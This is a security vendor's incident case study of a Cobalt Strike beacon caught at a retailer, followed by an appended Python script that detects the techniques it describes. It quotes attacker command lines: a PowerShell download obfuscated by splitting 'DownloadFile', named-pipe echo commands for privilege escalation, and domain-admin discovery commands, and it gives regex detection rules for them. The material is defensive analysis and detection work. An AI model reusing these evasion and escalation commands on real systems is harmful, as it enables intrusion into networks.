Cobalt strike beacon getting caught
The Network: A major retailer with over 2,500 employees and more than 100 stores and distribution centers is supported by an MSP, which uncovered a cyber criminal weaponizing the legitimate IT tool Cobalt Strike for malware distribution.

The Expectation: Protect the retailer's digital assets and sensitive data, and maintain uptime and resiliency by preventing malicious activity. Keep services such as eCommerce running, since they are crucial to retail organizations with supply chain partners and customers around the globe.

The Catch: The analyst team at Netsurion's Security Operations Center (SOC) used the advanced logic in the EventTracker platform to detect an obfuscated but suspicious PowerShell command. The legacy anti-virus was not sufficient to detect this tradecraft. The analyst uncovered a PowerShell process whose command line argument appeared very suspicious: the method name "DownloadFile" had been split into "D" + "Own" + "LOa" + "DfI" + "le" to evade known detection controls. Netsurion's SOC analyst also noticed a URL in the command line argument. To check the reputation of the artifact, the analyst uploaded the file to an IP monitoring service, which ranked it as having a poor reputation.

Observation: On accessing the URL in a controlled sandbox environment, Netsurion detected a file downloaded by the Cobalt Strike Beacon. Detailed investigation of the detected sequence showed a Cobalt Strike attack. It was then followed by named pipe command execution for impersonation and privilege escalation. The command lines observed were as follows.

The obfuscated download, which writes a file with a .ttf extension to C:\Windows\TEMP\ou.ttf (the URL was redacted in the report):
Powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'
Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('', 'C:\Windows\TEMP\ou.ttf')

Highly suspicious activity in which rundll32 loads a file that does not have a DLL extension, believed to execute malicious shellcode. The suspicious DLL is loaded and '11985756' is the parameter passed to its 'TstSec' function. Similar command line arguments have been reported in Cobalt Strike attacks by security research firms.

A named pipe command executed to escalate privileges (Windows Defender detected this as 'HackTool:Win32/NamedPipeImpers.A'):
C:\Windows\system32\cmd.exe /c echo 48e31e1d13a > \\.\pipe\2d6265

Domain and privileged-group discovery:
C:\Windows\system32\cmd.exe /C nltest /dclist:
C:\Windows\system32\cmd.exe /C net group "Domain admins" /domain
C:\Windows\system32\cmd.exe /C nltest /domain_trusts
C:\Windows\system32\cmd.exe /C net group "Enterprise admins" /domain
C:\Windows\system32\net1 group "Enterprise admins" /domain
C:\Windows\system32\net1 group "Domain admins" /domain

A second named pipe command (Windows Defender detected this as 'Behavior:Win32/CobaltStrike.H!nri'):
C:\Windows\system32\cmd.exe /c echo a848bdcc925 > \\.\pipe\c20734

Malicious Cobalt Strike Tactics and Techniques in MITRE ATT&CK: (mapping not reproduced on this page)

Cobalt Strike is an exploit tool used by defenders and hackers alike. It is powerful and flexible at simulating attacks and testing network defenses. It is available for registration and sale on legitimate websites as well as found on the criminal underground.

The Find: Netsurion's SOC detected every detail of this malware attack and provided the retailer with detailed remediation recommendations.
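The detections described in this case study, as an added example that is not Netsurion's code or part of the original post: a small Python triage script that folds the 'D' + 'Own' + 'LOa' + ... string concatenation back into one word before applying keyword rules, and flags the cmd.exe echo into a named pipe, the rundll32 load of a non-DLL file and the burst of domain discovery commands. The process-creation command lines it runs over are constructed here from the ones quoted above; the URL is a placeholder because the original was redacted, and the rundll32 line is an assumed shape that combines the page's "non-DLL extension" and "TstSec 11985756" observations.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample process-creation command lines, modelled on the ones
# quoted in the case study. The URL is a placeholder (the original was
# redacted) and the rundll32 line is an assumed shape, not a quoted one.
SAMPLE_COMMANDLINES = [
    "powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; "
    "Invoke-Expression (New-Object Net.WebClient).$ds.Invoke("
    "'http://example.invalid/x', 'C:\\Windows\\TEMP\\ou.ttf')",
    "rundll32.exe C:\\Windows\\TEMP\\ou.ttf,TstSec 11985756",
    "C:\\Windows\\system32\\cmd.exe /c echo 48e31e1d13a > \\\\.\\pipe\\2d6265",
    "C:\\Windows\\system32\\cmd.exe /C nltest /dclist:",
    'C:\\Windows\\system32\\cmd.exe /C net group "Domain admins" /domain',
    "C:\\Windows\\system32\\cmd.exe /C nltest /domain_trusts",
    "notepad.exe C:\\Users\\alice\\notes.txt",  # benign control line
]

# A run of quoted fragments glued together with '+': 'D' + 'Own' + 'LOa' ...
_CONCAT_RUN = re.compile(r"""(?:['"][^'"]*['"]\s*\+\s*)+['"][^'"]*['"]""")
_FRAGMENT = re.compile(r"""['"]([^'"]*)['"]""")


def fold_string_concats(cmdline: str) -> str:
    """Rejoin 'a' + 'b' + 'c' into 'abc' so keyword rules see the real word."""
    return _CONCAT_RUN.sub(
        lambda m: "'" + "".join(_FRAGMENT.findall(m.group(0))) + "'", cmdline)


def rundll32_loads_non_dll(cmdline: str) -> bool:
    """rundll32 whose first argument (the module path) lacks a .dll extension."""
    m = re.search(r'rundll32(?:\.exe)?\s+"?([^\s",]+)', cmdline, re.I)
    return bool(m) and not m.group(1).lower().endswith(".dll")


def _regex(pattern: str) -> Callable[[str], bool]:
    rx = re.compile(pattern, re.I)
    return lambda s: rx.search(s) is not None


RULES: List[Tuple[str, Callable[[str], bool]]] = [
    # Net.WebClient plus a Download* method, in whichever order they appear.
    ("webclient_download",
     _regex(r"^(?=.*net\.webclient)(?=.*download(?:file|string|data))")),
    ("invoke_expression", _regex(r"invoke-expression|\biex\b")),
    ("rundll32_non_dll", rundll32_loads_non_dll),
    # cmd.exe echoing a token into \\.\pipe\<name>: the named-pipe
    # impersonation pattern the report attributes to privilege escalation.
    ("named_pipe_impersonation",
     _regex(r"cmd\.exe\s+/c\s+echo\s+\S+\s*>\s*\\\\\.\\pipe\\")),
    ("domain_discovery",
     _regex(r'nltest\s+/(?:dclist|domain_trusts)'
            r'|net1?\s+group\s+"(?:domain|enterprise) admins"\s+/domain')),
]


def classify(cmdline: str, fold: bool = True) -> List[str]:
    """Names of the rules one command line triggers (after de-obfuscation)."""
    text = fold_string_concats(cmdline) if fold else cmdline
    return [name for name, match in RULES if match(text)]


def triage(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Group command lines by rule, and add a 'discovery_burst' bucket when
    three or more distinct domain-discovery commands appear in one batch."""
    hits: Dict[str, List[str]] = {}
    for line in cmdlines:
        for name in classify(line):
            hits.setdefault(name, []).append(line)
    if len(set(hits.get("domain_discovery", []))) >= 3:
        hits["discovery_burst"] = list(hits["domain_discovery"])
    return hits


if __name__ == "__main__":
    for rule, lines in triage(SAMPLE_COMMANDLINES).items():
        print(rule)
        for line in lines:
            print("   ", line)
```

Run on the raw PowerShell line, the webclient_download rule does not fire, because the word DownloadFile never appears contiguously; it fires only after the fragments are folded back together, which is the whole point of the attacker splitting the method name. The same rules apply unchanged to the CommandLine field of Sysmon event 1 or Windows Security event 4688 once command-line auditing is enabled.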